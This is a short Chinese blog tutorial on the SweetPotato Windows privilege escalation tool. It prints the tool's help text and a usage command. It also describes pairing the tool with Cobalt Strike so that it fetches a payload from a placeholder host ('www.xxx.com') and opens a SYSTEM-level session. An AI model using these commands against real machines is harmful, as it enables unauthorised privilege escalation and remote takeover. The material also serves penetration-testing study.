Windows提权之SweetPotato

admin 2023年3月27日08:36:18评论237 views字数 966阅读3分13秒阅读模式

基本介绍

从Windows 7到Windows 10 / Server 2019的本地服务到系统权限提升漏洞,也是土豆家族的有一个提权漏洞

项目地址

https://github.com/CCob/SweetPotato

Windows提权之SweetPotato

SweetPotato by @_EthicalChaos_  Orignal RottenPotato code and exploit by @foxglovesec  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery  PrintSpoofer discovery and original exploit by @itm4n  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam  -c, --clsid=VALUE          CLSID (default BITS:                               4991D34B-80A1-4291-83B6-3328366B9097)  -m, --method=VALUE         Auto,User,Thread (default Auto)  -p, --prog=VALUE           Program to launch (default cmd.exe)  -a, --args=VALUE           Arguments for program (default null)  -e, --exploit=VALUE        Exploit mode                               [DCOM|WinRM|EfsRpc|PrintSpoofer(default)]  -l, --listenPort=VALUE     COM server listen port (default 6666)  -h, --help                 Display this help

使用方法

SweetPotato.exe -a "whoami"

Windows提权之SweetPotato

再使用过程中可以自定义 clsid 与端口,--help或者 - h查看帮助

Windows提权之SweetPotato

同时可以对SweetPotato进行修改,使其可以直接上线一个system的session,效果图如下所示:

Step 1: 使用cs启动一个web攻击的简体Step 2: 执行以下命令SweetPotato.exe www.xxx.com/xxx.xxx

Windows提权之SweetPotato

文末小结

后续将会继续给出一些土豆家族的提权漏洞的使用方法,敬请期待~


原文始发于微信公众号(七芒星实验室):Windows提权之SweetPotato

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月27日08:36:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows提权之SweetPotatohttps://cn-sec.com/archives/1629285.html

发表评论

匿名网友 填写信息